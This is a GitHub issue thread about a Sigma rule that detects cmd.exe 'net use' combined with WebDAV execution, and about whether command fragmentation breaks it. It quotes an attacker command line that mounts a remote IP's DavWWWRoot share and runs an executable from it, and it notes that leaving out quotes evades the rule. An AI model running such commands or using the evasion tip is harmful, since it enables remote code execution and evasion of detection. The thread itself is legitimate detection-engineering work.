### ISSUE TITLE
Issues found in proc_creation_win_cmd_net_use_and_exec_combo.yml

### ISSUE THREAD

**Issue by DanielKoifman** [SigmaHQ/sigma#5141]
Hi team, I have a question/finding regarding https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml

The rule relies on the commandLine including ALL of the following:
- ' net use http'
- '& start /b '
- '\DavWWWRoot\'

The problem here is that because the commandLine in the associated reference source 

```block
"C:\Windows\System32\cmd.exe" /c net use http://164.92.205.182 && start /b \\164.92.205.182\DavWWWRoot\1C-Bitrix-0722.docx & start /b \\164.92.205.182\DavWWWRoot\lg.exe node.exe i
```
includes && and &, which, similarly to the pipe character, will split the command into different event logs and not a single one.

This can be easily simulated if I run the following command:

```block
whoami && ipconfig & ping 8.8.8.8
```
Which will result in three different event logs:
![image](https://github.com/user-attachments/assets/123fb73d-39a0-4029-a4cf-81fc3bb9b3e4)
![image](https://github.com/user-attachments/assets/d6276d3f-4fa1-406a-8b31-10b01e76d48b)
![image](https://github.com/user-attachments/assets/65b86288-1024-4b17-af4f-c6f62a0e0055)

Additionally, using "start /b" in the CMD does not log it. For example, running "start /b myFile.exe" will result in "Process Command Line:	myFile.exe"

In [this](https://detect.fyi/unintentional-evasion-investigating-how-cmd-fragmentation-hampers-detection-response-e5d7b465758e) article, it also supports this finding:
![image](https://github.com/user-attachments/assets/f78e85a2-0e81-47f3-8db7-ced277c79240)

I wasn't sure what would be the best way to fix it, so I created an issue instead of a PR.
Thank you in advance!

**Comment by nasbench** [comment]
Hi @DanielKoifman 

As explained [here](https://github.com/SigmaHQ/sigma/pull/5139#issuecomment-2561187492). The rule is looking for a full command with quotes. We are aware of the effect of cmd.exe and how commands are treated. Hence this is a best case detection. It can be bypassed by not using quotes but for that we have other coverage.
